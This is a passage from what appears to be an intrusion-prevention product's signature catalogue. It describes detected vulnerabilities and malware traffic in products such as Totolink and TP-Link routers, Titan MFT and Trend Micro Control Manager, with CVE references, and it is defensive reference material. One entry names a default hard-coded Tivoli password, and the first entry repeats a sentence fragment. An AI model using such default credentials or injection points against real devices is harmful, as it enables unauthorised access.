First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Distributed Transaction Controller
Type: Malfunction
Description: Microsoft Distributed Transaction Controller (MSDTC) has a denial-of-service vulnerability in its TIP implementation. A remote attacker can connect to MSDTC, which is by default listening on port 3372/tcp, and instruct the vulnerable server to connect to an attacker-controlled server. When the attacker-controlled server gives an out-of-context reply during the transaction, the vulnerable service will terminate causing a DoS. Patched versions of Windows do not open the TIP port 3372/tcp by default, as the service should only be used between trusted hosts.ult, as the service should only be used between trusted hosts.
Situation: Generic_TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS
References:
CVE-2005-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1979
BID-15058
http://www.securityfocus.com/bid/15058
MS05-051
http://technet.microsoft.com/security/bulletin/MS05-051
Back to top

TippingPoint-Ips-Reverse-DNS-Lookup-Format-String

About this vulnerability: A vulnerability in TippingPoint IPS
Risk: High
First detected in: sgpkg-ips-1351-5242
Last changed: sgpkg-ips-1351-5242
Platform: Generic
Software: TippingPoint IPS
Type: Input Validation
Description: There exists a vulnerability in the TippingPoint IPS command line management interface when performing reverse DNS lookups using the ping utility, which could possibly allow remote attackers to execute arbitrary code.
Situation: DNS-UDP_TippingPoint-Ips-Reverse-DNS-Lookup-Format-String
Back to top

Titan-FTP-Server-Denial-Of-Service

About this vulnerability: A Titan FTP Server Denial Of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Titan FTP Server
Type: Malfunction
Description: A vulnerability in Titan FTP Server, version 6.26 build 630, which allows remote attackers to cause a denial of service condition by sending a SITE WHO command.
Situation: FTP_CS-Titan-FTP-Server-Denial-Of-Service
References:
CVE-2008-6082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6082
OSVDB-49177
http://www.osvdb.org/49177
Back to top

Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689

About this vulnerability: An attempt to exploit a vulnerability in Titan MFT Server detected
Risk: High
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Platform: Generic
Software: Titan MFT Server
Type: Input Validation
Description: Lack of sufficient path validation in South River Technologies' Titan MFT and Titan SFTP servers on Windows and Linux allows an authenticated attacker with administrative privileges to read any file on the filesystem via path traversal.
Situation: File-Text_Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689
References:
CVE-2023-45689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45689
Back to top

Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686

About this vulnerability: An attempt to exploit a vulnerability in Titan MFT Server detected
Risk: High
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Platform: Generic
Software: Titan MFT Server
Type: Input Validation
Description: Insufficient path validation when writing a file via WebDAV in South River Technologies' Titan MFT and Titan SFTP servers on Linux allows an authenticated attacker to write a file to any location on the filesystem via path traversal.
Situation: HTTP_CSU-Titan-MFT-Server-Path-Traversal-Via-WebDAV-CVE-2023-45686
References:
CVE-2023-45686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45686
Back to top

Tivoli-Endpoint-Buffer-Overflow

About this vulnerability: A Tivoli Endpoint Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Tivoli Endpoint Manager
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in IBM Tivoli Endpoint Manager, versions 3.7.1, 4.1, 4.1.1, and 4.3.1, in lcfd.exe, which allows remote authenticated users to execute arbitrary code via a long opts field. This fingerprint also covers the use of the default hard-coded password tivoli:boss.
Situation: HTTP_CS-Tivoli-Endpoint-Buffer-Overflow
References:
CVE-2011-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1220
BID-48049
http://www.securityfocus.com/bid/48049
OSVDB-72713
http://www.osvdb.org/72713
Back to top

Tnftp-Redirection-Command-Execution-CVE-2014-8517

About this vulnerability: A vulnerability in tnftp
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Tnftp
Type: Input Validation
Description: A command execution vulnerability exists in NetBSD tnftp prior to version tnftp-20141031. This vulnerability is due to insufficient validation in redirection path parsing.
Situation: HTTP_SHS-Tnftp-Redirection-Command-Execution-CVE-2014-8517
References:
CVE-2014-8517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8517
Back to top

TNS_Oracle-Database-Server-XDB-Pitrig_truncate-Procedure-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Database Server
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Database; Oracle Application Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to procedure PITRIG_TRUNCATE in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code within the security context of the affected service.
Situation: Generic_CS-Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow
TNS_Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow
References:
CVE-2008-0339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0339
BID-27229
http://www.securityfocus.com/bid/27229
Back to top

Tofu-Backdoor

About this vulnerability: Tofu Backdoor
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Tofu is a proxy-aware backdoor.
Situation: HTTP_CSH-Tofu-Backdoor-Request
Back to top

Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt

About this vulnerability: An attempt to exploit a vulnerability in Tom Sawyer GET Extension Factory COM object
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware VI Client
Type: Malfunction
Description: A code execution vulnerability has been reported in the Tom Sawyer GET Extension Factory COM object. The vulnerability is due to an error while instantiating the ActiveX control in a browser. This control was not meant to be used within a browser. As such, an attempt to instantiate it will cause it to initialize incorrectly, leading to memory corruption.
Situation: HTTP_SS-Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
File-Text_Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
References:
CVE-2011-2217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2217
BID-48099
http://www.securityfocus.com/bid/48099
Back to top

Tomato-Trojan-Infection-Traffic

About this vulnerability: Tomato trojan infection traffic
Risk: High
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Tomato trojan infection traffic was detected.
Situation: HTTP_CSU-Tomato-Trojan-Infection-Traffic
Back to top

TomcatAJP-Request-Smuggling-CVE-2022-26377

About this vulnerability: An attempt to exploit a vulnerability in Tomcat AJP detected
Risk: High
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Inconsistent Interpretation of HTTP Requests ("HTTP Request Smuggling") vulnerability in "mod_proxy_ajp" of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.
Situation: File-Binary_TomcatAJP-Request-Smuggling
References:
CVE-2022-26377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26377
Back to top

TOR-Network-Usage

About this vulnerability: Detects TOR network usage
Risk: Low
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: TOR client; Vidalia; Pivoxy
Type: Browser
Description: Detects TOR network usage.
Situation: TLS_CS-TOR-Meek-Domain-Fronting
TLS_CS-Possible-Psiphon-Meek-Domain-Fronting
TLS-SNI_Suspicious-Server-Name-Indication
TLS-SNI_Snowflake-Proxy
Back to top

Total-JS-CMS-12-Widget-JavaScript-Code-Injection

About this vulnerability: A vulnerability in Total.js CMS
Risk: High
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Mac OS X
Software: Total.js
Type: Javascript Injection
Description: A vulnerability in Total.js CMS 12.0.0 which allows remote attackers to execute arbitrary code by creating a malicious widget with a special tag containing JavaScript code.
Situation: HTTP_CRL-Total-JS-CMS-12-Widget-JavaScript-Code-Injection
References:
CVE-2019-15954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15954
Back to top

Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186

About this vulnerability: A vulnerability in Totolink N600R
Risk: High
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: Totolink
Type: Input Validation
Description: A command injection vulnerability has been reported in the Totolink N600R wireless router. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via HTTP requests to cstecgi.cgi.
Situation: HTTP_CRL-Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186
References:
CVE-2022-26186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26186
Back to top

Totolink-Routers-Multiple-Command-Injection-Vulnerabilities

About this vulnerability: A vulnerability in Totolink
Risk: High
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1648-5242
Platform: Generic
Software: Totolink
Type: Input Validation
Description: Multiple similar command injection vulnerabilities have been reported in various Totolink routers. This situation covers attempts to exploit CVE-2021-43711, CVE-2022-25075, CVE-2022-25076, CVE-2022-25077, CVE-2022-25078, CVE-2022-25079, CVE-2022-25080, CVE-2022-25081, CVE-2022-25082, CVE-2022-25083, and CVE-2022-25084. An unauthenticated attacker can use these vulnerabilities to execute arbitrary code via GET requests to downloadFlile.cgi program.
Situation: HTTP_CSU-Totolink-Routers-Multiple-Command-Injection-Vulnerabilities
References:
CVE-2022-25075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25075
Back to top

Totolink-setupgradefw-Command-Injection-CVE-2022-26210

About this vulnerability: A vulnerability in Totolink wireless routers
Risk: High
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1537-5242
Platform: Generic
Software: Totolink
Type: Input Validation
Description: A command injection vulnerability has been reported in Totolink A830R, A3100R, A950RG, A800R, A3000RU, and A810R wireless routers. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via HTTP requests to cstecgi.cgi.
Situation: File-Text_Totolink-setupgradefw-Command-Injection-CVE-2022-26210
References:
CVE-2022-26210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26210
Back to top

Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability

About this vulnerability: A vulnerability in a Totolink Wireless Router detected
Risk: High
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Platform: Generic
Software: Totolink
Type: Input Validation
Description: A vulnerability in multiple Totolink Wireless Router products that allows remote attackers to execute arbitrary code through the "command" parameter, in setting/setTracerouteCfg.
Situation: HTTP_CRL-Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability
References:
CVE-2023-30013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30013
Back to top

TP-Link-Archer-A7-tdpServer-Command-Injection

About this vulnerability: A vulnerability in TP-Link Archer A7 routers.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Linux
Software: TP-Link
Type: Input Validation
Description: A vulnerability in TP-Link Archer A7 routers, in the tdpServer service, which allows remote attackers to execute arbitrary commands vie the slave_mac parameter.
Situation: Generic_UDP-TP-Link-Archer-A7-tdpServer-Command-Injection
References:
CVE-2020-10882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10882
Back to top

TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389

About this vulnerability: A vulnerability in TP-Link Archer AX21
Risk: High
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: TP-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in the firmware of TP-Link Archer AX21 routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands as root.
Situation: HTTP_CRL-TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389
References:
CVE-2023-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1389
Back to top

TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection

About this vulnerability: A vulnerability in TP-LINK Cloud Cameras
Risk: High
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: TP-Link
Type: Input Validation
Description: TP-LINK Cloud Cameras including products NC200, NC210, NC220, NC230, NC250, NC260, and NC450 suffer from a command injection vulnerability.
Situation: HTTP_CRL-TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection
References:
CVE-2020-12109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109
Back to top

TP-Link-Directory-Traversal

About this vulnerability: A TP-Link Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TP-Link
Type: Directory Traversal
Description: A vulnerability in TP-Link TL-WA701N and TL-WA701ND which allows remote attackers to perform directory traversals and execute HTML injections due to the insufficient user-supplied input validation.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2012-5687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5687
BID-57969
http://www.securityfocus.com/bid/57969
OSVDB-86881
http://www.osvdb.org/86881
Back to top

TP-Link-Local-File-Disclosure-CVE-2015-3035

About this vulnerability: A vulnerability in TP-Link routers
Risk: High
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Platform: Generic
Software: TP-Link
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in multiple TP-Link products, including Archer C5, C7, C8, and C9 routers. Successful exploitation of this vulnerability can result in local file disclosure.
Situation: HTTP_CSU-TP-Link-Local-File-Disclosure-CVE-2015-3035
References:
CVE-2015-3035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3035
Back to top

TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045

About this vulnerability: A vulnerability in TP-Link Tapo C200 IP camera
Risk: High
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Platform: Generic
Software: TP-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in TP-Link Tapo C200 IP cameras. The vulnerability is due to insufficient validation of user input and it may allow unauthenticated attackers to execute arbitrary code.
Situation: HTTP_CRL-TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045
References:
CVE-2021-4045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4045
Back to top

TP-Link-TL-WR1043N-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in TP-Link WR1043N router firmware
Risk: High
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Platform: Generic
Software: TP-Link
Type: Malfunction
Description: A cross-site request forgery vulnerability has been reported in the TP-Link WR1043N router firmware version TL-WR1043ND_V1_120405.
Situation: File-Text_TP-Link-TL-WR1043N-Cross-Site-Request-Forgery
References:
CVE-2013-2645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2645
Back to top

TP-Link-TLWR840N-Command-Injection-CVE-2022-25060

About this vulnerability: An attempt to exploit a vulnerability in TP-Link TL-WR840N detected
Risk: High
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Platform: Generic
Software: TP-Link
Type: Code Injection
Description: A command injection vulnerability has been reported in TP-Link TL-WR840N wireless router.
Situation: HTTP_CRL-TP-Link-TLWR840N-Command-Injection-CVE-2022-25060
References:
CVE-2022-25060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25060
Back to top

TP-Link-WR940N-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in TP-Link WR940N routers
Risk: High
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Platform: Generic
Software: TP-Link
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in TP-Link WR940N router hardware version 4. Successful exploitation of this vulnerability can allow remote authenticated attackers to execute arbitrary code.
Situation: HTTP_CRL-TP-Link-WR940N-Stack-Buffer-Overflow
References:
CVE-2017-13772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13772
Back to top

Traccar-Path-Traversal-CVE-2024-24809

About this vulnerability: A vulnerability in Traccar
Risk: Moderate
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1830-5242
Platform: Generic
Software: Traccar
Type: Input Validation
Description: A path traversal vulnerability in Traccar allows an attacker to perform registration on the service.
Situation: HTTP_CSH-Traccar-Path-Traversal-CVE-2024-24809
References:
CVE-2024-24809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24809
Back to top

Trace-Mode-UDP-Denial-Of-Service-1-Ver1

About this vulnerability: A vulnerability in Trace Mode allowing denial of service
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trace Mode
Type: Malfunction
Description: A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a system crash.
Situation: Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver1
Back to top

Trace-Mode-UDP-Denial-Of-Service-1-Ver2

About this vulnerability: A vulnerability in Trace Mode allowing denial of service
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trace Mode
Type: Malfunction
Description: A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a system crash.
Situation: Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver2
Back to top

Trace-Mode-UDP-Denial-Of-Service-1-Ver3

About this vulnerability: A vulnerability in Trace Mode allowing denial of service
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trace Mode
Type: Malfunction
Description: A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a violation of service.
Situation: Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver3
Back to top

Trace-Mode-UDP-Denial-Of-Service-1-Ver4

About this vulnerability: A vulnerability in Trace Mode allowing denial of service
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trace Mode
Type: Malfunction
Description: A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a violation of service.
Situation: Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver4
Back to top

Trace-Mode-UDP-Denial-Of-Service-2

About this vulnerability: A vulnerability in Trace Mode allowing denial of service.
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trace Mode
Type: Malfunction
Description: A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a crash of the runtime monitor.
Situation: Generic_CS-Trace-Mode-UDP-Denial-Of-Service-2
Back to top

TrackerCam-Server-Php-Script-Argument-BOF

About this vulnerability: Buffer overflow in TrackerCam server
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: TrackerCam
Type: Buffer Overflow
Description: TrackerCam server contains a buffer overflow that can be exploited via a long argument to an arbitrary PHP script on the server. A remote attacker could exploit this vulnerability to cause a denial of service or to execute arbitrary code on the server.
Situation: HTTP_CRL-TrackerCam-Server-Php-Script-Argument-BOF
References:
CVE-2005-0478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0478
BID-12592
http://www.securityfocus.com/bid/12592
OSVDB-13953
http://www.osvdb.org/13953
Back to top

Translate-F-MS00-058

About this vulnerability: MS00-058 Translate header allows file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.0
Type: Malfunction
Description: It is possible to view the source code of .asp files and other server side scripts by requesting the files with a special "Translate" header. A successful attack may leak sensitive information to the attacker and possibly allow more severe attacks that may lead into a system compromise.
Situation: HTTP_CS-Translate-F-MS00-58-Sourcecode-Disclosure-Attempt
References:
CVE-2000-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0778
BID-1578
http://www.securityfocus.com/bid/1578
MS00-058
http://technet.microsoft.com/security/bulletin/MS00-058
Back to top

Treasure-Data-Digdag-Getfile-Directory-Traversal

About this vulnerability: A vulnerability in Treasure Data Digdag
Risk: Moderate
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: Digdag
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Treasure Data Digdag. The vulnerability is due to improper validation of API request parameters. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.
Situation: HTTP_CSU-Treasure-Data-Digdag-Getfile-Directory-Traversal
References:
CVE-2024-25125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25125
Back to top

Trellian-FTP-Client-Remote-Buffer-Overflow

About this vulnerability: A Trellian FTP Client Remote Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Trellian FTP Client
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Trellian FTP Client, versions 3.01 including 3.1.3.1789, which allows remote attackers to execute arbitrary code via a long PASV response.
Situation: FTP_SS-Trellian-FTP-Client-Remote-Buffer-Overflow
References:
CVE-2010-1465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1465
OSVDB-63812
http://www.osvdb.org/63812
Back to top

Trend-Micro-AntiVirus-Password-Manager-Command-Execution

About this vulnerability: A vulnerability in Trend Micro Antivirus Password Manager
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Antivirus Password Manager
Type: Malfunction
Description: There exists a design weakness in Trend Micro Antivirus Password Manager. A remote attacker can exploit this to access sensitive information and execute arbitrary code.
Situation: File-Text_Trend-Micro-AntiVirus-Password-Manager-Command-Execution
Back to top

Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal

About this vulnerability: A vulnerability in Trend Micro Apex One
Risk: Moderate
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Apex One; Trend Micro OfficeScan
Type: Directory Traversal
Description: Improper validation of user-supplied file names in HTTP requests causes a directory traversal vulnerability in Trend Micro OfficeScan. A successful exploit may allow an attacker to delete files using system privileges.
Situation: HTTP_CRL-Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal
References:
CVE-2020-8470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8470
Back to top

Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal

About this vulnerability: A vulnerability in Trend Micro Apex One
Risk: Moderate
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Apex One; Trend Micro OfficeScan
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Trend Micro Apex One and OfficeScan. Successful exploitation could lead in remote code execution.
Situation: HTTP_CRH-Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal
References:
CVE-2020-8599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8599
Back to top

Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: There is an SQL injection vulnerability in Trend Micro Control Manager. The vulnerability is due to insufficient input validation on user queries by the ad hoc query module. A remote, authenticated attacker could exploit this vulnerability by sending crafted "id" parameter in the GET request for AdHocQuery_Processor.aspx page. A successful exploitation attempt could result in the execution of SQL commands under the context of the SYSTEM user.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection
References:
CVE-2012-2998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2998
OSVDB-85807
http://www.osvdb.org/85807
Back to top

Trend-Micro-Control-Manager-Adhocquery-Getproductcategory-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of user-supplied input for the SelectNodeID HTTP parameter within GetProductCategory method called from AdHocQuery_Processor.aspx causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit allows an attacker to run arbitrary code with the privileges of the service.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor-Getproductcategory-SQL-Injection
References:
CVE-2018-3602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3602
Back to top

Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of HTTP requests causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection
Back to top

Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of the user-supplied input for cmdHandlerLicenseManager.dll causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit may allow code execution in addition to SQL access.
Situation: Generic_CS-Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection
References:
CVE-2017-11384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11384
Back to top

Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection

About this vulnerability: A Trend Micro Control Manager cmdHandlerStatusMonitor SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: SQL Injection
Description: An SQL injection vulnerability in Trend Micro Control Manager, versions 6.0 prior to SP3 Patch 3, which allows remote attacker to execute arbitrary code by sending a crafted request to the target server, due to the improper validation of input to cmdHandlerStatusMonitor.dll and DMServer.exe.
Situation: Generic_CS-Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection
References:
CVE-2017-11385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11385
Back to top

Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of user input causes an SQL Injection vulnerability in Trend Micro Control Manager. A successfull exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection
References:
CVE-2017-11383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11383
Back to top

Trend-Micro-Control-Manager-Cmdprocessor.exe-Addtask-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Trend Micro Control Manager. The vulnerability is caused by copying of user-controlled data to a fixed-length buffer without sufficient validation. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted packet(s) to the CmdProcessor.exe component on TCP ports 20101 and 20102. A successful exploitation attempt could result in execution of arbitrary code within the security context of the Trend Micro Control Manager process.
Situation: Generic_CS-Trend-Micro-Control-Manager-Cmdprocessor-Addtask-Buffer-Overflow
References:
CVE-2011-5001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5001
OSVDB-77585
http://www.osvdb.org/77585
Back to top

Trend-Micro-Control-Manager-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: A cross site request forgery vulnerability exists in Trend Micro Control Manager. An attacker craft a url that when followed by a user can insert arbitrary records into the database, including user accounts and administrator privileges. A remote attacker can exploit this vulnerability by enticing a user to follow crafted URI, upon successful exploitation the attacker can login to the administrator console with the created account and execute commands with the privileges of the affected service.
Situation: HTTP_SS_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery
